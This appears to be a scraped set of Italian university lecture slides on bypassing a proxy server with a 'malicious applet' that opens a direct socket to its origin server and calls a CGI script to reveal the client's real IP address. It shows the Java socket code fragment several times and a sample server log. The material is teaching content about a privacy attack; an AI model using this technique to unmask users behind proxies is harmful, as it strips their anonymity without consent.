pdf color - Dipartimento di Informatica ed Applicazioni
02.06.2013 Views
Share Embed Flag

pdf color - Dipartimento di Informatica ed Applicazioni

pdf color - Dipartimento di Informatica ed Applicazioni

pdf color - Dipartimento di Informatica ed Applicazioni

SHOW MORE
SHOW LESS
ePAPER READ
DOWNLOAD ePAPER
di.unisa.it

You also want an ePaper? Increase the reach of your titles

YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.

START NOW

Bypass Proxy Server<br />

Applet Maliziosa 3<br />

Co<strong>di</strong>ce sorgente dell’applet:<br />

Cbase contiene: “http://www.inetpolice.com/cgi-bin”)<br />

Socket socket = new Socket(rhost, 80);<br />

PrintStream printstream = new PrintStream(socket.getOutputStream());<br />

printstream.println("GET " + cbase + cgifile);<br />

in = new DataInputStream(socket.getInputStream());<br />

res = in.readLine();<br />

printstream.close();<br />

socket.close();<br />

Bypass Proxy Server<br />

Applet Maliziosa 3<br />

Co<strong>di</strong>ce sorgente dell’applet:<br />

Invia una richiesta <strong>di</strong> tipo GET,<br />

(“GET http://www.inetpolice.com/cgi-bin/get_env.cgi”)<br />

Socket socket = new Socket(rhost, 80);<br />

PrintStream printstream = new PrintStream(socket.getOutputStream());<br />

printstream.println("GET " + cbase + cgifile);<br />

in = new DataInputStream(socket.getInputStream());<br />

res = in.readLine();<br />

printstream.close();<br />

socket.close();<br />

Bypass Proxy Server<br />

Applet Maliziosa 4<br />

Dopo che l’applet, eseguita dal Client, ha effettuato una<br />

connessione al server <strong>di</strong> appartenenza, invia una richiesta<br />

<strong>di</strong> tipo GET al Server<br />

Il server riceve tale richiesta <strong>di</strong>rettamente dal client <strong>ed</strong><br />

esegue il file cgi richiesto dal Client<br />

La cgi “get_env.cgi” può facilmente sapere l’in<strong>di</strong>rizzo<br />

reale del client in quanto gli viene fornito dalla richiesta GET<br />

Segue l’invio al client della seguente stringa :<br />

“nome_client [ind_ip_client]”<br />

Bypass Proxy Server<br />

Applet Maliziosa 3<br />

Co<strong>di</strong>ce sorgente dell’applet:<br />

Cgifile contiene: “get_env.cgi”)<br />

Socket socket = new Socket(rhost, 80);<br />

PrintStream printstream = new PrintStream(socket.getOutputStream());<br />

printstream.println("GET " + cbase + cgifile);<br />

in = new DataInputStream(socket.getInputStream());<br />

res = in.readLine();<br />

printstream.close();<br />

socket.close();<br />

Bypass Proxy Server<br />

Applet Maliziosa 3<br />

Co<strong>di</strong>ce sorgente dell’applet:<br />

RES contiene la stringa inviata<br />

dal Server nel formato:<br />

“nome_client [ind_ip_client]”<br />

Socket socket = new Socket(rhost, 80);<br />

PrintStream printstream = new PrintStream(socket.getOutputStream());<br />

printstream.println("GET " + cbase + cgifile);<br />

in = new DataInputStream(socket.getInputStream());<br />

res = in.readLine();<br />

printstream.close();<br />

socket.close();<br />

Bypass Proxy Server<br />

Applet Maliziosa 5<br />

La stringa che il client riceve la mette nella variabile<br />

res il cui contenuto verrà fatto visualizzare sul browser<br />

del client me<strong>di</strong>ante l’applet in esecuzione<br />

Quando il client effettua la GET, sia il server, che il cgi<br />

“get_env.cgi” v<strong>ed</strong>ranno la seguente cosa :<br />

192.168.1.3 - - [13/Jun/2003:18:48:28 +0200]<br />

"GET http://inet-police.com/cgi-bin/get_env.cgi" 200 34<br />

Il server ora conosce il vero IP del client: Bypass Riuscito!

logo

Prodotti

Risorse

Aziende

Terms of service
Privacy policy
Cookie policy
Cookie settings
Imprint
Change language
Made with love in Switzerland
© 2024 Yumpu.com all rights reserved

Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!